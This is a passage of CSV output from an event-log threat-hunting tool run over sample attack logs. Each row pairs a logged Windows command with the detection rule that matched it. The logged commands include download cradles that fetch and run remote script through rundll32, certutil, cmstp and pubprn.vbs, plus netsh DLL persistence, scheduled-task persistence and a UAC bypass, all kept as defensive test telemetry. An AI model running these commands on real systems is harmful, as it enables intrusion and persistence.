""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 
+09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port 
Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.252 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
/C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 
+09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 
+09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 
script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 